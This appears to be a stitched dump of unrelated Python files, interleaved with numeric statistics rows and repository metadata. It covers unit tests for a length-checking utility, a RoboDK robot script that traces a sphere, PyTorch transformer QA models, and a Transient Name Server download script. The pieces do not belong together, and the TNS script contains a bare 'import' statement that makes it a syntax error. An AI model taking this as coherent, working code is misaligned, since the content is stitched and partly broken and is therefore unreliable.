log_msg = ["ERROR:root:Length of odict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!"]
err_msg = ("Length of odict_items([('one', 1), ('two', 2)])"
" must be 6, not 2!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.items(), length=6)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_ordered_dict_items_wrong_length(self):
inp = OrderedDict({'one': 1, 'two': 2})
log_msg = ['ERROR:root:Length of odict_items test must be 7, not 2!']
err_msg = 'Length of odict_items test must be 7, not 2!'
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(LenError) as err:
_ = JustLen(inp.items(), 'test', length=7)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
class TestJustLenMethods(ut.TestCase):
    """Checks on the checker attributes composed onto JustLen."""

    def test_has_iterable_type_checker_attributes(self):
        """JustLen exposes one attribute per registered (like-)iterable."""
        for checker_type in (*_ITERABLES, *_LIKE_ITERABLES):
            self.assertTrue(hasattr(JustLen, checker_type.__name__))
        self.assertTrue(hasattr(JustLen, 'LikeSized'))

    def test_iterable_type_checkers_are_type_CompositionOf(self):
        """Every attached checker attribute is a CompositionOf."""
        for checker_type in (*_ITERABLES, *_LIKE_ITERABLES):
            self.assertIsInstance(getattr(JustLen, checker_type.__name__),
                                  CompositionOf)
        self.assertIsInstance(getattr(JustLen, 'LikeSized'), CompositionOf)

    def test_length_is_passed_through_type_checker(self):
        """The length keyword reaches JustLen through a composed checker."""
        msg = 'Length of str bar must be 6, not 3!'
        with self.assertLogs(level=logging.ERROR) as log, \
                self.assertRaises(LenError) as err:
            _ = JustLen.JustStr('bar', length=6)
        self.assertEqual(str(err.exception), msg)
        self.assertEqual(log.output, ['ERROR:root:' + msg])

    def test_has_attribute_o(self):
        self.assertTrue(hasattr(JustLen, 'o'))

    def test_attribute_o_is_callable(self):
        self.assertTrue(callable(JustLen.o))

    def test_o_returns_composition(self):
        """Composing JustLen with a plain callable yields a CompositionOf."""
        def identity(value):
            return value
        self.assertIsInstance(JustLen.o(identity), CompositionOf)

    def test_o_raises_error_on_argument_not_callable(self):
        """Composing with a non-callable raises a descriptive CallableError."""
        msg = ('foo must be a callable that accepts (i) a value,'
               ' (ii) an optional name for that value, and (iii)'
               ' any number of keyword arguments!')
        with self.assertRaises(CallableError) as err:
            _ = JustLen.o('foo')
        self.assertEqual(str(err.exception), msg)
# Run the whole test suite when this file is executed as a script.
if __name__ == '__main__':
    ut.main()
| 47.994334
| 79
| 0.612501
| 4,727
| 33,884
| 4.20055
| 0.029617
| 0.036865
| 0.061442
| 0.064515
| 0.924053
| 0.916247
| 0.90693
| 0.897714
| 0.882554
| 0.869309
| 0
| 0.024499
| 0.259149
| 33,884
| 705
| 80
| 48.062411
| 0.766482
| 0
| 0
| 0.561688
| 0
| 0.012987
| 0.197586
| 0
| 0
| 0
| 0
| 0
| 0.400974
| 1
| 0.133117
| false
| 0.001623
| 0.012987
| 0.001623
| 0.152597
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0417459d1ee31c320551abac1621c3020ff7c9a7
| 4,464
|
py
|
Python
|
SpherePath.py
|
YoushaaMurhij/KR3_R540_AR_VR_Control
|
cb41a60935d7ae3b459d479f7b0ada0f364bbc33
|
[
"Apache-2.0"
] | 3
|
2020-07-08T09:56:34.000Z
|
2021-05-12T07:35:46.000Z
|
SpherePath.py
|
YoushaaMurhij/KR3_R540_AR_VR_Control
|
cb41a60935d7ae3b459d479f7b0ada0f364bbc33
|
[
"Apache-2.0"
] | null | null | null |
SpherePath.py
|
YoushaaMurhij/KR3_R540_AR_VR_Control
|
cb41a60935d7ae3b459d479f7b0ada0f364bbc33
|
[
"Apache-2.0"
] | 1
|
2021-07-23T08:04:24.000Z
|
2021-07-23T08:04:24.000Z
|
# Draw a hexagon around the Target 1
from robolink import * # RoboDK's API
from robodk import * # Math toolbox for robots
# Start the RoboDK API:
# Connect to the RoboDK API of the running RoboDK session.
RDK = Robolink()
# Get the robot (first robot found):
robot = RDK.Item('', ITEM_TYPE_ROBOT)
# Get the reference target by name:
target = RDK.Item('Target 1')
target_pose = target.Pose()  # full pose (position + orientation) of the target
xyz_ref = target_pose.Pos()  # [x, y, z] position of the reference target
# Move the robot to the reference point:
robot.MoveJ(target)
# NOTE(review): the '##' blocks below are earlier hexagon/circle demos that
# were left commented out; kept verbatim for reference.
# Draw a hexagon around the reference target:
##for i in range(7):
##    ang = i*2*pi/6 # Angle = 0,60,120,...,360
##    R = 50 # Polygon radius
##    # Calculate the new position around the reference:
##    x = xyz_ref[0] + R*cos(ang) # new X coordinate
##    y = xyz_ref[1] + R*sin(ang) # new Y coordinate
##    z = xyz_ref[2] # new Z coordinate
##    target_pose.setPos([x,y,z])
##    # Move to the new target:
##    robot.MoveL(target_pose)
### Trigger a program call at the end of the movement
##robot.RunInstruction('Program_Done')
### Move back to the reference target:
##robot.MoveL(target)
##
##
### Move back to the reference target:
##robot.MoveL(target)
##target = RDK.Item('Target 2')
##target_pose = target.Pose()
##xyz_ref = target_pose.Pos()
##
##robot.MoveJ(target)
##num_steps=25
##R=100
##step=R/num_steps;
### Draw a circle around the reference target:
##for i in range(0, num_steps+1):
##    x=xyz_ref[0]+R-i*step;
##    y=(R**2-(x-xyz_ref[0])**2)**(0.5) + xyz_ref[1]
##    z=xyz_ref[2]
##    target_pose.setPos([x,y,z])
##    robot.MoveL(target_pose)
##for i in range(0, num_steps+1):
##    x=xyz_ref[0]-i*step;
##    y=(R**2-(x-xyz_ref[0])**2)**(0.5) + xyz_ref[1]
##    z=xyz_ref[2]
##    target_pose.setPos([x,y,z])
##    robot.MoveL(target_pose)
##for i in range(0, num_steps+1):
##    x=xyz_ref[0]-R+i*step;
##    y=-1*((R**2-(x-xyz_ref[0])**2)**(0.5)) + xyz_ref[1]
##    z=xyz_ref[2]
##    target_pose.setPos([x,y,z])
##    robot.MoveL(target_pose)
##for i in range(0, num_steps+1):
##    x=xyz_ref[0]+i*step;
##    y=-1*(R**2-(x-xyz_ref[0])**2)**(0.5) + xyz_ref[1]
##    z=xyz_ref[2]
##    target_pose.setPos([x,y,z])
##    robot.MoveL(target_pose)
### Trigger a program call at the end of the movement
##robot.RunInstruction('Program_Done')
### Move back to the reference target:
##robot.MoveL(target)
# Move back to the reference target:
robot.MoveL(target)
# Re-anchor the path on 'Target 2' for the sphere drawing below.
target = RDK.Item('Target 2')
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
robot.MoveJ(target)
num_steps=15  # linear moves per quarter circle
num_steps_z=10  # horizontal slices per hemisphere
r=100  # sphere radius (presumably mm, RoboDK's default unit — TODO confirm)
step_z=r/num_steps_z  # vertical spacing between slices
def _trace_circle(z):
    """Trace one horizontal cross-section of the sphere at height z.

    The circle radius is R = sqrt(r**2 - (z - z_ref)**2). It is drawn in
    four quadrants of num_steps+1 linear moves each, starting at +X and
    sweeping through +Y, -X, -Y — the exact point sequence of the original
    inline loops (the arithmetic is reproduced verbatim so the generated
    robot path is unchanged). Uses the module-level robot, target_pose,
    xyz_ref, r and num_steps.
    """
    R = (r**2 - (z - xyz_ref[2])**2)**0.5
    step = R/num_steps
    # Quadrant 1: x goes +R -> 0, y >= 0
    for i in range(0, num_steps+1):
        x = xyz_ref[0]+R-i*step
        y = (R**2-(R-i*step)**2)**(0.5) + xyz_ref[1]
        target_pose.setPos([x, y, z])
        robot.MoveL(target_pose)
    # Quadrant 2: x goes 0 -> -R, y >= 0
    for i in range(0, num_steps+1):
        x = xyz_ref[0]-i*step
        y = (R**2-(i*step)**2)**(0.5) + xyz_ref[1]
        target_pose.setPos([x, y, z])
        robot.MoveL(target_pose)
    # Quadrant 3: x goes -R -> 0, y <= 0
    for i in range(0, num_steps+1):
        x = xyz_ref[0]-R+i*step
        y = -1*((R**2-(-R+i*step)**2)**(0.5)) + xyz_ref[1]
        target_pose.setPos([x, y, z])
        robot.MoveL(target_pose)
    # Quadrant 4: x goes 0 -> +R, y <= 0
    for i in range(0, num_steps+1):
        x = xyz_ref[0]+i*step
        y = -1*(R**2-(i*step)**2)**(0.5) + xyz_ref[1]
        target_pose.setPos([x, y, z])
        robot.MoveL(target_pose)

# Draw a sphere around the reference target: lower hemisphere first
# (z from z_ref - r up to z_ref - step_z), then upper hemisphere
# (z from z_ref up to z_ref + r). The two original loops shared an
# identical 20-line body, now deduplicated into _trace_circle.
for j in range(num_steps_z, 0, -1):
    _trace_circle(xyz_ref[2] - j*step_z)
for j in range(0, num_steps_z+1):
    _trace_circle(xyz_ref[2] + j*step_z)
# Trigger a program call at the end of the movement
robot.RunInstruction('Program_Done')
# Move back to the reference target:
robot.MoveL(target)
| 31
| 57
| 0.598118
| 822
| 4,464
| 3.118005
| 0.103406
| 0.098322
| 0.112368
| 0.053063
| 0.802575
| 0.769411
| 0.761998
| 0.761998
| 0.738978
| 0.723761
| 0
| 0.044726
| 0.203629
| 4,464
| 143
| 58
| 31.216783
| 0.676231
| 0.458557
| 0
| 0.776119
| 0
| 0
| 0.012281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029851
| 0
| 0.029851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f098dc58ae44414f096a968db4ccb2bc034f78d9
| 4,104
|
py
|
Python
|
models/transformer_qa.py
|
jeffdshen/squad
|
61ed2120fc06f5e33204200ac0f8d86d1da6f361
|
[
"MIT"
] | null | null | null |
models/transformer_qa.py
|
jeffdshen/squad
|
61ed2120fc06f5e33204200ac0f8d86d1da6f361
|
[
"MIT"
] | null | null | null |
models/transformer_qa.py
|
jeffdshen/squad
|
61ed2120fc06f5e33204200ac0f8d86d1da6f361
|
[
"MIT"
] | null | null | null |
"""Various full transformer models for QA.
Author:
Jeffrey Shen
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.cuda.amp as amp
import models.transformer as T
class GloveTransformerQA(nn.Module):
    """Transformer-encoder QA model over pretrained (GloVe-style) vectors.

    Tokens are embedded with a pretrained token embedding plus learned
    positional embeddings, run through a stack of transformer encoder
    layers, and projected to two logits per position (start/end scores,
    from ``output_logits=2`` on the head).

    Args:
        dim: Model/embedding dimension.
        n_heads: Attention heads per encoder layer.
        ff_dim: Hidden size of each layer's feed-forward block.
        activation: Activation used inside the feed-forward block.
        dropout: Dropout on embeddings and encoder sublayers.
        attn_dropout: Dropout on attention weights.
        act_dropout: Dropout after the feed-forward activation.
        n_layers: Number of encoder layers.
        max_positions: Maximum sequence length for positional embeddings.
        word_vectors: Pretrained embedding matrix for the token embedding.
    """

    def __init__(
        self,
        dim,
        n_heads,
        ff_dim,
        activation,
        dropout,
        attn_dropout,
        act_dropout,
        n_layers,
        max_positions,
        word_vectors,
    ):
        super().__init__()
        self.embed = T.TransformerEncoderEmbedding(
            T.PretrainedTokenEmbedding(word_vectors, dim),
            T.LearnedPositionalEmbedding(max_positions, dim),
            dim=dim,
            dropout=dropout,
        )
        self.encoder = T.TransformerEncoder(
            T.TransformerEncoderLayer(
                dim=dim,
                n_heads=n_heads,
                ff_dim=ff_dim,
                activation=activation,
                dropout=dropout,
                attn_dropout=attn_dropout,
                act_dropout=act_dropout,
            ),
            n_layers=n_layers,
        )
        self.head = T.LinearQAHead(dim=dim, output_logits=2)
        # BERT-style init (normal, std=0.02) applied to every submodule.
        self.apply(lambda mod: T.init_params_bert(mod, 0.02))

    # x: (N, S), positions: (N, S), padding_mask: (N, S) -> (N, S, 2).
    # The transposes below convert batch-first inputs to the seq-first
    # layout the T.* modules appear to expect, then back for the caller.
    @amp.autocast()
    def forward(self, x, positions=None, padding_mask=None):
        """Score each position with start/end logits under autocast."""
        x = x.transpose(0, 1)
        if positions is None:
            positions = T.get_positions(x)
        else:
            positions = positions.transpose(0, 1)
        x = self.embed(x, positions)
        x = self.encoder.forward(x, key_padding_mask=padding_mask)
        x = self.head(x)
        x = x.transpose(0, 1)
        return x

    # (N, S, 2), (N, S) -> (N, S, 2)
    def mask_scores(self, x, padding_mask):
        """Delegate masking of padded positions to the QA head."""
        return self.head.mask_scores(x, padding_mask)

    # (N, S, 2) -> (N, S, 2)
    def get_log_prob(self, x):
        """Delegate log-probability computation to the QA head."""
        return self.head.get_log_prob(x)

    # (N, S, 2) -> (N, S, 2)
    def get_prob(self, x):
        """Delegate probability computation to the QA head."""
        return self.head.get_prob(x)

    # (N, S, 2), (N, 2) -> (1, )
    def get_loss(self, scores, y):
        """Delegate loss computation to the QA head."""
        return self.head.get_loss(scores, y)
class WordTransformerQA(nn.Module):
    """Transformer-encoder QA model with fully learned token embeddings.

    Identical architecture to GloveTransformerQA except the token
    embedding is learned from scratch (vocabulary size taken from
    ``word_vectors.size(0)``, padding index 0) instead of pretrained.

    Args:
        dim: Model/embedding dimension.
        n_heads: Attention heads per encoder layer.
        ff_dim: Hidden size of each layer's feed-forward block.
        activation: Activation used inside the feed-forward block.
        dropout: Dropout on embeddings and encoder sublayers.
        attn_dropout: Dropout on attention weights.
        act_dropout: Dropout after the feed-forward activation.
        n_layers: Number of encoder layers.
        max_positions: Maximum sequence length for positional embeddings.
        word_vectors: Only its first dimension (vocab size) is used here.
    """

    def __init__(
        self,
        dim,
        n_heads,
        ff_dim,
        activation,
        dropout,
        attn_dropout,
        act_dropout,
        n_layers,
        max_positions,
        word_vectors,
    ):
        super().__init__()
        self.embed = T.TransformerEncoderEmbedding(
            T.LearnedTokenEmbedding(word_vectors.size(0), dim, 0),
            T.LearnedPositionalEmbedding(max_positions, dim),
            dim=dim,
            dropout=dropout,
        )
        self.encoder = T.TransformerEncoder(
            T.TransformerEncoderLayer(
                dim=dim,
                n_heads=n_heads,
                ff_dim=ff_dim,
                activation=activation,
                dropout=dropout,
                attn_dropout=attn_dropout,
                act_dropout=act_dropout,
            ),
            n_layers=n_layers,
        )
        self.head = T.LinearQAHead(dim=dim, output_logits=2)
        # BERT-style init (normal, std=0.02) applied to every submodule.
        self.apply(lambda mod: T.init_params_bert(mod, 0.02))

    # x: (N, S), positions: (N, S), padding_mask: (N, S) -> (N, S, 2).
    # The transposes below convert batch-first inputs to the seq-first
    # layout the T.* modules appear to expect, then back for the caller.
    @amp.autocast()
    def forward(self, x, positions=None, padding_mask=None):
        """Score each position with start/end logits under autocast."""
        x = x.transpose(0, 1)
        if positions is None:
            positions = T.get_positions(x)
        else:
            positions = positions.transpose(0, 1)
        x = self.embed(x, positions)
        x = self.encoder.forward(x, key_padding_mask=padding_mask)
        x = self.head(x)
        x = x.transpose(0, 1)
        return x

    # (N, S, 2), (N, S) -> (N, S, 2)
    def mask_scores(self, x, padding_mask):
        """Delegate masking of padded positions to the QA head."""
        return self.head.mask_scores(x, padding_mask)

    # (N, S, 2) -> (N, S, 2)
    def get_log_prob(self, x):
        """Delegate log-probability computation to the QA head."""
        return self.head.get_log_prob(x)

    # (N, S, 2) -> (N, S, 2)
    def get_prob(self, x):
        """Delegate probability computation to the QA head."""
        return self.head.get_prob(x)

    # (N, S, 2), (N, 2) -> (1, )
    def get_loss(self, scores, y):
        """Delegate loss computation to the QA head."""
        return self.head.get_loss(scores, y)
| 28.109589
| 66
| 0.541179
| 516
| 4,104
| 4.122093
| 0.155039
| 0.018806
| 0.019746
| 0.015045
| 0.86977
| 0.86977
| 0.86977
| 0.86977
| 0.86977
| 0.86977
| 0
| 0.01547
| 0.33845
| 4,104
| 146
| 67
| 28.109589
| 0.767956
| 0.084308
| 0
| 0.886957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104348
| false
| 0
| 0.043478
| 0.069565
| 0.252174
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0c396f04c14b94520c437db9d012b0597475c3a
| 13,995
|
py
|
Python
|
tns_check.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
tns_check.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
tns_check.py
|
changsuchoi/cspy
|
9fa8f125bed368f636ea19180e742f8304bbc432
|
[
"MIT"
] | null | null | null |
# daily tns report
# unclassified AT
# classified object
# include FRB
# save csv file as tns_search.csv in /home/cschoi/Download
# https://www.wis-tns.org/content/tns-getting-started
import os
import astropy.io.ascii as ascii
import sys
from astropy.table import Table, Column
import astropy.coordinates as coord
from astropy.time import Time
import astropy.units as u
import numpy as np
from astropy.coordinates import Angle
from astropy.coordinates import ICRS
from astropy.coordinates import SkyCoord
import pandas as pd
from datetime import datetime
# Work from the local SN-list cache directory (hard-coded cluster path).
os.chdir('/data7/cschoi/sngal/recent-sne-check/rochester-list')
#datetime.today().strftime("%Y%m%d%H%M%S") # time formatted as YYYYmmddHHMMSS
#datetime.today().strftime("%Y/%m/%d %H:%M:%S") # time formatted as YYYY/mm/dd HH:MM:SS
today=datetime.today()
# Keep only the YYYYmmdd prefix of the formatted timestamp.
today=datetime.today().strftime("%Y%m%d %H:%M:%S")[:8]
print(today)
radius=10.0 # search radius in arcmin; NOTE(review): old comment said "30 arcmin = 0.5 deg" but the value is 10.0 — confirm intent
print ('Radius '+str(radius)+' arcmin')
# print ('Reading recentsnelist.txt file ...')
# colnames=['Ra','Dec','EarliestObs','Host','Type','Last','Max','Link','Discoverer']
# latestsnelist=pd.read_table('recentsnelist.txt')
# latestsnelist=pd.read_table('recentlist.txt') #,names=colnames,data_start=1,guess='False')
# latestsnelist=ascii.read('recentsnelist.txt',delimiter='\t') #,names=colnames,data_start=1,guess='False')
# IMSNG target catalogue used later for cross-matching.
imsnglist=ascii.read('/data7/cschoi/IMSNG/target/alltarget.dat')
# tns server search for 7days
# three 500 num pages files
# Download the last-7-days TNS search results (3 pages x 500 rows) as CSV.
# The three original os.system lines differed only in the page number, so
# the ~1.8 kB query is built once and formatted per page.
# NOTE(review): os.system + curl kept for behavior parity; subprocess.run
# with an argument list (or the official TNS API) would be more robust.
_TNS_QUERY = (
    'https://www.wis-tns.org/search?&page={page}'
    '&discovered_period_value=7&discovered_period_units=days'
    '&unclassified_at=0&classified_sne=0&include_frb=1&name=&name_like=0'
    '&isTNS_AT=all&public=all&ra=&decl=&radius=&coords_unit=arcsec'
    '&reporting_groupid%5B%5D=null&groupid%5B%5D=null'
    '&classifier_groupid%5B%5D=null&objtype%5B%5D=null&at_type%5B%5D=null'
    '&date_start%5Bdate%5D=&date_end%5Bdate%5D='
    '&discovery_mag_min=&discovery_mag_max=&internal_name=&discoverer='
    '&classifier=&spectra_count=&redshift_min=&redshift_max=&hostname='
    '&ext_catid=&ra_range_min=&ra_range_max=&decl_range_min=&decl_range_max='
    '&discovery_instrument%5B%5D=null&classification_instrument%5B%5D=null'
    '&associated_groups%5B%5D=null&official_discovery=0'
    '&official_classification=0&at_rep_remarks=&class_rep_remarks='
    '&frb_repeat=all&frb_repeater_of_objid=&frb_measured_redshift=0'
    '&frb_dm_range_min=&frb_dm_range_max=&frb_rm_range_min=&frb_rm_range_max='
    '&frb_snr_range_min=&frb_snr_range_max=&frb_flux_range_min='
    '&frb_flux_range_max=&num_page=500&display%5Bredshift%5D=1'
    '&display%5Bhostname%5D=1&display%5Bhost_redshift%5D=1'
    '&display%5Bsource_group_name%5D=1'
    '&display%5Bclassifying_source_group_name%5D=1'
    '&display%5Bdiscovering_instrument_name%5D=0'
    '&display%5Bclassifing_instrument_name%5D=0&display%5Bprograms_name%5D=0'
    '&display%5Binternal_name%5D=1&display%5BisTNS_AT%5D=0'
    '&display%5Bpublic%5D=1&display%5Bend_pop_period%5D=0'
    '&display%5Bspectra_count%5D=1&display%5Bdiscoverymag%5D=1'
    '&display%5Bdiscmagfilter%5D=1&display%5Bdiscoverydate%5D=1'
    '&display%5Bdiscoverer%5D=1&display%5Bremarks%5D=0&display%5Bsources%5D=0'
    '&display%5Bbibcode%5D=0&display%5Bext_catalogs%5D=0'
    '&display%5Brepeater_of_objid%5D=0&display%5Bdm%5D=0'
    '&display%5Bgalactic_max_dm%5D=0&display%5Bbarycentric_event_time%5D=0'
    '&display%5Bpublic_webpage%5D=0&format=csv'
)
for _page in range(3):  # writes tns0.csv, tns1.csv, tns2.csv
    os.system("curl '" + _TNS_QUERY.format(page=_page)
              + "' > tns" + str(_page) + '.csv')
# one day search
#os.system("curl \'https://www.wis-tns.org/&page=X&search?&discovered_period_value=7&discovered_period_units=days&unclassified_at=0&classified_sne=0&include_frb=1&name=&name_like=0&isTNS_AT=all&public=all&ra=&decl=&radius=&coords_unit=arcsec&reporting_groupid%5B%5D=null&groupid%5B%5D=null&classifier_groupid%5B%5D=null&objtype%5B%5D=null&at_type%5B%5D=null&date_start%5Bdate%5D=&date_end%5Bdate%5D=&discovery_mag_min=&discovery_mag_max=&internal_name=&discoverer=&classifier=&spectra_count=&redshift_min=&redshift_max=&hostname=&ext_catid=&ra_range_min=&ra_range_max=&decl_range_min=&decl_range_max=&discovery_instrument%5B%5D=null&classification_instrument%5B%5D=null&associated_groups%5B%5D=null&official_discovery=0&official_classification=0&at_rep_remarks=&class_rep_remarks=&frb_repeat=all&frb_repeater_of_objid=&frb_measured_redshift=0&frb_dm_range_min=&frb_dm_range_max=&frb_rm_range_min=&frb_rm_range_max=&frb_snr_range_min=&frb_snr_range_max=&frb_flux_range_min=&frb_flux_range_max=&display%5Bredshift%5D=1&display%5Bhostname%5D=1&display%5Bhost_redshift%5D=1&display%5Bsource_group_name%5D=1&display%5Bclassifying_source_group_name%5D=1&display%5Bdiscovering_instrument_name%5D=0&display%5Bclassifing_instrument_name%5D=0&display%5Bprograms_name%5D=0&display%5Binternal_name%5D=1&display%5BisTNS_AT%5D=0&display%5Bpublic%5D=1&display%5Bend_pop_period%5D=0&display%5Bspectra_count%5D=1&display%5Bdiscoverymag%5D=1&display%5Bdiscmagfilter%5D=1&display%5Bdiscoverydate%5D=1&display%5Bdiscoverer%5D=1&display%5Bremarks%5D=0&display%5Bsources%5D=0&display%5Bbibcode%5D=0&display%5Bext_catalogs%5D=0&display%5Brepeater_of_objid%5D=0&display%5Bdm%5D=0&display%5Bgalactic_max_dm%5D=0&display%5Bbarycentric_event_time%5D=0&display%5Bpublic_webpage%5D=0&format=csv\' > tnstest.csv")
# Load the per-page TNS search results downloaded above via curl.
# NOTE(review): tns0.csv is produced before this visible chunk — confirm
# the page-0 download exists upstream.
tns0 = ascii.read('tns0.csv')
tns1 = ascii.read('tns1.csv')
tns2 = ascii.read('tns2.csv')
# vstack
# FIX: the original next line was a bare `import` statement — a
# SyntaxError that prevented this module from loading at all. Judging by
# the "# vstack" note and the astropy `ascii.read` calls above, the
# author likely intended `from astropy.table import vstack` (to combine
# tns0/tns1/tns2 into one table); restore that import once confirmed.
'''
https://www.wis-tns.org/search?
&page=0
&discovered_period_value=1
&discovered_period_units=days
&unclassified_at=0
&classified_sne=0
&include_frb=1
&name=
&name_like=0
&isTNS_AT=all
&public=all
&ra=
&decl=
&radius=
&coords_unit=arcsec
&reporting_groupid%5B%5D=null
&groupid%5B%5D=null
&classifier_groupid%5B%5D=null
&objtype%5B%5D=null
&at_type%5B%5D=null
&date_start%5Bdate%5D=
&date_end%5Bdate%5D=
&discovery_mag_min=
&discovery_mag_max=
&internal_name=
&discoverer=
&classifier=
&spectra_count=
&redshift_min=
&redshift_max=
&hostname=
&ext_catid=
&ra_range_min=
&ra_range_max=
&decl_range_min=
&decl_range_max=
&discovery_instrument%5B%5D=null
&classification_instrument%5B%5D=null
&associated_groups%5B%5D=null
&official_discovery=0
&official_classification=0
&at_rep_remarks=
&class_rep_remarks=
&frb_repeat=all
&frb_repeater_of_objid=
&frb_measured_redshift=0
&frb_dm_range_min=
&frb_dm_range_max=
&frb_rm_range_min=
&frb_rm_range_max=
&frb_snr_range_min=
&frb_snr_range_max=
&frb_flux_range_min=
&frb_flux_range_max=
&num_page=500
&display%5Bredshift%5D=1
&display%5Bhostname%5D=1
&display%5Bhost_redshift%5D=1
&display%5Bsource_group_name%5D=1
&display%5Bclassifying_source_group_name%5D=1
&display%5Bdiscovering_instrument_name%5D=0
&display%5Bclassifing_instrument_name%5D=0
&display%5Bprograms_name%5D=0
&display%5Binternal_name%5D=1
&display%5BisTNS_AT%5D=0
&display%5Bpublic%5D=1
&display%5Bend_pop_period%5D=0
&display%5Bspectra_count%5D=1
&display%5Bdiscoverymag%5D=1
&display%5Bdiscmagfilter%5D=1
&display%5Bdiscoverydate%5D=1
&display%5Bdiscoverer%5D=1
&display%5Bremarks%5D=0
&display%5Bsources%5D=0
&display%5Bbibcode%5D=0
&display%5Bext_catalogs%5D=0
&display%5Brepeater_of_objid%5D=0
&display%5Bdm%5D=0
&display%5Bgalactic_max_dm%5D=0
&display%5Bbarycentric_event_time%5D=0
&display%5Bpublic_webpage%5D=0
&page=X
&format=csv
Quick query links
Unclassified ATs:
https://www.wis-tns.org/search?&isTNS_AT=yes&unclassified_at=1&num_page=500
Unclassified ATs within a discovery magnitude range (e.g. 15-17):
https://www.wis-tns.org/search?&isTNS_AT=yes&unclassified_at=1&discovery...
Classified SNe:
https://www.wis-tns.org/search?&isTNS_AT=yes&classified_sne=1&num_page=500
To download as CSV, add "&format=csv", e.g. for classified SNe:
https://www.wis-tns.org/search?&isTNS_AT=yes&classified_sne=1&num_page=5...
Additional notes:
- The maximum allowed number of results per page is 500 (num_page=500).
- If downloading as CSV/TSV and the retrieved results surpass the maximum, you
may implement paging by specifying &page=X (0 being the 1st page), e.g.:
https://www.wis-tns.org/search?&page=0&isTNS_AT=yes&classified_sne=1&num...
https://www.wis-tns.org/search?&page=1&isTNS_AT=yes&classified_sne=1&num...
[ Top ]
Daily CSV Staging
Every day after UT midnight, two CSV files are created and are accessible for
download under: https://www.wis-tns.org/system/files/tns_public_objects/
1. tns_public_objects.csv.zip - holds the entire catalog of TNS public objects
(AT/SN/FRB/... ~70,000 currently). This file is overwritten daily. The date and
time when the list of objects was created is specified in the first line; e.g.
"2021-03-15 00:00:00"
2. tns_public_objects_YYYYMMDD.csv.zip - holds only those entries (objects) that
were either added or modified during the specified day. So, e.g. during Mar 15,
2021 it is possible to download this latest CSV for the previous day:
tns_public_objects_20210314.csv.zip The first line in the CSV will contain the
exact duration covering the entries in the file; e.g. for the above example:
"2021-03-14 00:00:00 - 23:59:59"
The separate daily files remain in place for 1 month backwards.
Staging the CSV files serves to fulfil requests by TNS users, as well as encourage
performing time-consuming operations locally by users, reducing the load on the
TNS servers.
For example, if you need to cross-match entire catalogs or long object lists, we
request that this would be done locally, against the csv (or a locally managed
DB), rather than by executing multiple cone-searches via the Search API. Calling
the APIs for a limited number of objects is clearly fine, but we ask that our
users apply appropriate caution and sensibility when using the TNS resources,
that serve a broad community.
The CSV files contain the following columns:
"objid","name_prefix","name","ra","declination","redshift","typeid","type",
"reporting_groupid","reporting_group","source_groupid","source_group",
"discoverydate","discoverymag","discmagfilter","filter",
"reporters","time_received","internal_names","creationdate","lastmodified"
cURL usage examples for downloading (note that the api_key is required):
curl -X POST -d 'api_key=YOUR-API-KEY' https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec... > tns_public_objects.csv.zip
curl -X POST -d 'api_key=YOUR-API-KEY' https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec... > tns_public_objects_20210314.csv.zip
Or if logged in, you can just go to the URL for downloading the CSV:
https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec...
https://www.wis-tns.org/system/files/tns_public_objects/tns_public_objec... (specify the required date)
'''
| 55.098425
| 1,791
| 0.817506
| 2,368
| 13,995
| 4.603041
| 0.166385
| 0.019266
| 0.059633
| 0.021835
| 0.739266
| 0.735138
| 0.731101
| 0.720092
| 0.712202
| 0.704771
| 0
| 0.049741
| 0.049018
| 13,995
| 253
| 1,792
| 55.316206
| 0.769254
| 0.183637
| 0
| 0
| 0
| 0.111111
| 0.887557
| 0.014744
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.518519
| null | null | 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
f0e72a87fa7ce9b1264f70ed19e101617491ddc1
| 6,954
|
py
|
Python
|
worms/tests/test_pose_contortions.py
|
abiedermann/worms
|
026c45a88d5c71b0e035ac83de6f4dc107316ed8
|
[
"Apache-2.0"
] | 4
|
2018-01-30T23:13:43.000Z
|
2021-02-12T22:36:54.000Z
|
worms/tests/test_pose_contortions.py
|
abiedermann/worms
|
026c45a88d5c71b0e035ac83de6f4dc107316ed8
|
[
"Apache-2.0"
] | 9
|
